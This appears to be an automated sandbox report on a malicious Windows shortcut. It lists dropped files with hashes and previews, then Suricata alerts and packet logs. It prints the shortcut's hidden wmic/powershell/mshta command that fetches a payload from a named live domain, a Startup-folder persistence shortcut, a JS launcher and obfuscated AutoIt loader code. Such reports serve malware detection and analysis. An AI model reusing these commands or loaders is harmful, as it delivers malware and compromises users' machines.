                                                                                                                  Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

                                                                                                                  C:\Users\user\AppData\Local\WordGenius Technologies\G

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:ASCII text, with very long lines (1266)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1151620
                                                                                                                  Entropy (8bit):5.19847743673391
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:D8V+jcfSygd6pMMrD3UYhU1FPCuY23OvAnzz/v3ptwcd:DcyUpMuePTX5VtwC
                                                                                                                  MD5:1B839E7A6F23E34ACE5BC4D3C01081FB
                                                                                                                  SHA1:FED9871AD44FED784E0A39F8FDCBDDC80E55127A
                                                                                                                  SHA-256:467611EA7F5603E8233FB254AE22C63CB3FADE5B0626379DD5CF394294205C39
                                                                                                                  SHA-512:4C4CB23B2E94D5F97BF6D33DB1F4FE385F1057C9227F2C195EBF8C39CA76E439C0A63C8B997BC12652D512D1F888DF2030FC3CBD43A68E678B11DC0DE2439F8F
                                                                                                                  Malicious:false
                                                                                                                  Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]

                                                                                                                  C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):186
                                                                                                                  Entropy (8bit):4.7401751318145395
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:RiMIpGXfeNH5E5wWAX+aJp6/h4EkD5yKXW/Zi+0/RaMl85uWAX+aJp6/h4EkD5yn:RiJbNHCwWDaJ0/hJkDrXW/Zz0tl8wWDH
                                                                                                                  MD5:633E34C077F6828A474217CE7DE57BED
                                                                                                                  SHA1:6C7EF480F22DE38D9EDF82EF35C4F5943540E164
                                                                                                                  SHA-256:FE9F225D70AC67046F622C2F52E17CB8CEDD111F51AEAA17C5ADBE48846E21AF
                                                                                                                  SHA-512:358C0EBBA88DA82FCDDE3D1C518C559DADBA02E7D5935A5D12BBC5D1463A8BA094FC2AD186CDE82316010E1C4C5E18C2314C4FED70DB433C39C8FF3015577995
                                                                                                                  Malicious:true
                                                                                                                  Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")

                                                                                                                  C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):893608
                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Roaming\Job_Description.pdf

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PDF document, version 1.6
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3438614
                                                                                                                  Entropy (8bit):7.565365361527372
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:GtZNvjFRGx8mEuSEEBWfJoGnihnR3YSnyYbAYFdhzQCnGkH:GtZJFRGxZEuSEEBE6GkR3YSnyuFsXkH
                                                                                                                  MD5:13E442980DFB1FED9EE67DD9CE5C165D
                                                                                                                  SHA1:958D4B5F59CF46E817461DD2C67CDE1106FFE508
                                                                                                                  SHA-256:3D80994983233EE77AF8200DC292C95D12AD7DF091BB3FB83DA6613CE74D6CCE
                                                                                                                  SHA-512:AE9A6CEE5FAC67C3623EC5F51FF053BA47B9B4C0F811FDDA9DF290AF53923F3184771F31E1F62F889164508334E1C44407EBF0DC038FC116C1A7826625E0FE2F
                                                                                                                  Malicious:false
                                                                                                                  Preview:%PDF-1.6.%.....1 0 obj.<<./Type /Catalog./Version /1.6./Pages 2 0 R.>>.endobj.6 0 obj.<<./Length 526549./Type /XObject./Subtype /Image./Filter /DCTDecode./BitsPerComponent 8./Width 2480./Height 3508./ColorSpace /DeviceRGB.>>.stream.......+Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2024:12:13 16:15:59..................................................................................&.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................q.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5.

                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):99
                                                                                                                  Entropy (8bit):4.9306597478632
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5yKXW/Zi+URAAy:HRYF5yjo923yKXW/Zzyy
                                                                                                                  MD5:EF6AD112185745A629FB60A8A2678649
                                                                                                                  SHA1:500391A0E969362BFA1DFE7A116A9395E29D29DA
                                                                                                                  SHA-256:14555F0A16F710F533606B316DE7765634F60BD9FC5D1946D80EAA29104ACAF9
                                                                                                                  SHA-512:2F3E1A025E02EB111BB3E9F6E1CCEE3AD3A7A7BC90C0DF7D0C4ECD90BA7792A5D3C361113423BC9ED035FCA77EA5B9870AD1B648E1A86E717F7D29672699176D
                                                                                                                  Malicious:true
                                                                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..

                                                                                                                  C:\Users\user\AppData\Roaming\rMpqCJnPv.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1083904
                                                                                                                  Entropy (8bit):6.306391209676911
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:4rORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaA1a:42EYTb8atv1orq+pEiSDTj1VyvBay
                                                                                                                  MD5:7E279E8E3DCD0BCD240E36D7317924D3
                                                                                                                  SHA1:A72FD80EB3E4181B1BF167504F6D1309693734EE
                                                                                                                  SHA-256:45DEA3D8D1370926857577932E3F296E4084282B5270E9E10FC2D43CE44FA497
                                                                                                                  SHA-512:9539256529BEA462F3105A6642BC0E9DA10C784EE17DDA3B897DFC1252A514A37A2DE9FA52804434D88DD607E6582B7680279FE3B0F2CC127E923ABF77CC5DF1
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d.....gg.........."......4...R.......T.........@..........................................`...@...............@..............................\..|........A...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....A.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................

                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                  \Device\ConDrv

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):160
                                                                                                                  Entropy (8bit):5.095703110114614
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgmER0wFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egmETeAc
                                                                                                                  MD5:CD2F6BF4766CC06C99DA9B40BC45CDDA
                                                                                                                  SHA1:2CF7E19309BB8AF8056A58AB20E5E8F159A008EC
                                                                                                                  SHA-256:FA58A72EEE86FE685E4EC39CF0FFC4A20FB1055B98E0A84F9491C0E582086773
                                                                                                                  SHA-512:05B7923AEB62FA464BEED20B842749192A38CB4F24959C78974EB9219457312A0135CD5C0DECADDB6F5EFACDA396AF9D3B5D403A3FBF7802DB496970BF57B323
                                                                                                                  Malicious:false
                                                                                                                  Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 4180;...ReturnValue = 0;..};....

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                                  Entropy (8bit):2.638740361153191
                                                                                                                  TrID:
                                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                                  File name:FzmtNV0vnG.lnk
                                                                                                                  File size:1'912 bytes
                                                                                                                  MD5:ac9d5bb32e4d1c1cf52bf17bfdd8cf7b
                                                                                                                  SHA1:b9c921613643e7c500783326483523e92e6ab016
                                                                                                                  SHA256:4883c36a3b5c9d4f4c318312dce1058d722e8a378adb3e348203bc93f41540d6
                                                                                                                  SHA512:bef5c40abcceb076ccbc2c707c63de6d3eb1aaa957e0c62f2fa5ef38826ff21c47eada2bb7490284a47036d1f545f9ca6fae82a5ee29dbbd0574d1d841dff7da
                                                                                                                  SSDEEP:24:8AyH/BUlgKN4ee+/31kWNdk6Zoc6gehqdd79dsrabqyI+pu:89uGep1ldkU65MdJ9Aaey3w
                                                                                                                  TLSH:BC415E041AE90B20F3B7CE72547AB721897F7C5AED728F1C018186892532A20E875F6B
                                                                                                                  File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:72d282828e8d8dd5

                                                                                                                  Static Windows Shortcut Info

                                                                                                                  General

                                                                                                                  Relative Path:..\..\..\..\Windows\System32\Wbem\wmic.exe
                                                                                                                  Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"
                                                                                                                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-23T07:11:35.553406+01002026434ET MALWARE VBScript Redirect Style Exe File Download1147.45.49.155443192.168.2.549704TCP
                                                                                                                  2024-12-23T07:11:49.698928+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549714147.45.49.155443TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 23, 2024 07:11:32.856156111 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:32.856199026 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:32.856286049 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:32.866528988 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:32.866544962 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:34.392072916 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:34.392239094 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:34.633163929 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:34.633234978 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:34.633924961 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:34.633995056 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:34.653436899 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:34.695346117 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.118575096 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.118638992 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.310581923 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.310594082 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.310630083 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.310679913 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.310693979 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.310729027 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.310796022 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.360361099 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.360385895 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.360466003 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.360490084 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.360536098 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.360536098 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.512402058 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.512442112 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.512497902 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.512518883 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.512547016 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.512600899 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.553446054 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.553473949 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.553565025 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.553565025 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.553579092 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.553636074 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.579391956 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.579423904 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.579499960 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.579514980 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.579557896 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.579557896 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.607486010 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.607522964 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.607567072 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.607588053 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.607635975 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.607695103 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.707053900 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.707077026 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.707151890 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.707170963 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.707212925 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.707212925 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.725451946 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.725471973 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.725528002 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.725547075 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.725698948 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.744395971 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.744415998 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.744529963 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.744529963 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.744541883 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.746440887 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.758795023 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.758822918 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.758913040 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.758913040 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.758927107 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.759063959 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.770039082 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.770059109 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.770246029 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.770246983 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.770262957 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.770308971 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.864228010 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.864257097 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.864311934 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.864341974 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.864403963 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.864403963 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.893009901 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.893032074 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.893105984 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.893121004 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.893404007 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.903225899 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.903254032 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.903301954 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.903322935 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.903382063 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.903382063 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.913062096 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.913084030 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.913139105 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.913161039 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.913201094 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.913201094 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.921510935 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.921530008 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.921572924 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.921590090 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.921636105 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.921636105 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.931926012 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.931946039 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.932004929 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.932018995 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.932070017 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.932070017 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.940426111 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.940438986 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.940501928 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.940511942 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.940855026 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.950140953 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.950165987 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.950225115 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.950238943 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:35.950285912 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:35.950285912 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:36.058434963 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:36.058509111 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:36.059293985 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:36.059293985 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:36.059324026 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:36.059497118 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:36.084449053 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:36.084497929 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:36.084615946 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:36.084626913 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:36.084780931 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:36.084780931 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:36.092526913 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:36.092575073 CET44349704147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:36.092765093 CET49704443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:36.092765093 CET49704443192.168.2.5147.45.49.155
